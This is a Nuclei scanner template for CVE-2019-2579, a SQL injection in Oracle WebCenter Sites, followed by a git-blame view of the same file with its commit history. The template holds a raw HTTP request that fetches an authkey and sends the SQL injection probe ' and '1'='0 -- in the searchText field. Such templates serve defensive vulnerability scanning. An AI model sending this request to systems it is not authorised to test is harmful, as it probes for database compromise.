nuclei-templates/http/cves/2019/CVE-2019-2579.yaml

id: CVE-2019-2579

info:
  name: Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 - SQL Injection
  author: leovalcante
  severity: medium
  description: The Oracle WebCenter Sites component of Oracle Fusion Middleware 12.2.1.3.0 is susceptible to SQL injection via an easily exploitable vulnerability that allows low privileged attackers with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebCenter Sites accessible data.
  remediation: |
    Apply the necessary patches or updates provided by Oracle to mitigate the SQL Injection vulnerability.
  reference:
    - https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
    - https://github.com/Leovalcante/wcs_scanner
    - https://nvd.nist.gov/vuln/detail/CVE-2019-2579
    - http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 4.3
    cve-id: CVE-2019-2579
    epss-score: 0.00493
    epss-percentile: 0.7345
    cpe: cpe:2.3:a:oracle:webcenter_sites:12.2.1.3.0:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: oracle
    product: webcenter_sites
  tags: cve,cve2019,oracle,wcs,sqli

http:
  - raw:
      - |
        GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /cs/ContentServer HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _authkey_={{authkey}}&pagename=OpenMarket%2FXcelerate%2FAdmin%2FWebReferences&op=search&urlsToDelete=&resultsPerPage=25&searchChoice=webroot&searchText=%27+and+%271%27%3D%270+--+

    cookie-reuse: true

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "value='&#39; and &#39;1&#39;=&#39;0 --"
          - "Use this utility to view and manage URLs"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: authkey
        group: 1
        regex:
          - "NAME='_authkey_' VALUE='([0-9A-Z]+)'>"
        internal: true
        part: body

# digest: 4b0a0048304602210092b6428f65c968e1ad5df1015634b76e1d4843e684f9bb0462d14cfc859c386b022100c38270558a0dba4a6f928b73ca1ca1cd256bfda21c8362e2ccd3a7e6729f9516:922c64590222798bb761d5b6d8e72950
Added CVE-2019-2579 2021-11-06 10:40:58 +00:00			`id: CVE-2019-2579`

			`info:`
Dashboard Content Enhancements (#4338) Dashboard Content Enhancements 2022-05-09 16:12:52 +00:00			`name: Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 - SQL Injection`
Added CVE-2019-2579 2021-11-06 10:40:58 +00:00			`author: leovalcante`
			`severity: medium`
Dashboard Content Enhancements (#4338) Dashboard Content Enhancements 2022-05-09 16:12:52 +00:00			`description: The Oracle WebCenter Sites component of Oracle Fusion Middleware 12.2.1.3.0 is susceptible to SQL injection via an easily exploitable vulnerability that allows low privileged attackers with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebCenter Sites accessible data.`
updated 2019 CVEs 2023-09-06 12:53:28 +00:00			`remediation: \|`
			`Apply the necessary patches or updates provided by Oracle to mitigate the SQL Injection vulnerability.`
Added CVE-2019-2579 2021-11-06 10:40:58 +00:00			`reference:`
			`- https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites`
			`- https://github.com/Leovalcante/wcs_scanner`
Dashboard Content Enhancements (#4338) Dashboard Content Enhancements 2022-05-09 16:12:52 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2019-2579`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`- http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html`
Auto Generated CVE annotations [Sat Nov 6 10:59:41 UTC 2021] :robot: 2021-11-06 10:59:41 +00:00			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`cvss-score: 4.3`
Auto Generated CVE annotations [Sat Nov 6 10:59:41 UTC 2021] :robot: 2021-11-06 10:59:41 +00:00			`cve-id: CVE-2019-2579`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`epss-score: 0.00493`
TemplateMan Update [Tue Nov 14 14:37:18 UTC 2023] :robot: 2023-11-14 14:37:18 +00:00			`epss-percentile: 0.7345`
updated 2019 CVEs 2023-09-06 12:53:28 +00:00			`cpe: cpe:2.3:a:oracle:webcenter_sites:12.2.1.3.0:::::::*`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 2`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: oracle`
			`product: webcenter_sites`
			`tags: cve,cve2019,oracle,wcs,sqli`
Added CVE-2019-2579 2021-11-06 10:40:58 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Added CVE-2019-2579 2021-11-06 10:40:58 +00:00			`- raw:`
			`- \|`
			`GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1`
			`Host: {{Hostname}}`
			`- \|`
			`POST /cs/ContentServer HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`_authkey_={{authkey}}&pagename=OpenMarket%2FXcelerate%2FAdmin%2FWebReferences&op=search&urlsToDelete=&resultsPerPage=25&searchChoice=webroot&searchText=%27+and+%271%27%3D%270+--+`

			`cookie-reuse: true`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`words:`
Dashboard Content Enhancements (#4339) * Spacing issues 2022-05-09 16:16:12 +00:00			`- "value='' and '1'='0 --"`
Added CVE-2019-2579 2021-11-06 10:40:58 +00:00			`- "Use this utility to view and manage URLs"`
			`condition: and`

			`- type: status`
			`status:`
Dashboard Content Enhancements (#4338) Dashboard Content Enhancements 2022-05-09 16:12:52 +00:00			`- 200`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00
			`extractors:`
			`- type: regex`
			`name: authkey`
			`group: 1`
			`regex:`
			`- "NAME='_authkey_' VALUE='([0-9A-Z]+)'>"`
			`internal: true`
			`part: body`
TemplateMan Update [Tue Nov 14 14:37:18 UTC 2023] :robot: 2023-11-14 14:37:18 +00:00
			`# digest: 4b0a0048304602210092b6428f65c968e1ad5df1015634b76e1d4843e684f9bb0462d14cfc859c386b022100c38270558a0dba4a6f928b73ca1ca1cd256bfda21c8362e2ccd3a7e6729f9516:922c64590222798bb761d5b6d8e72950`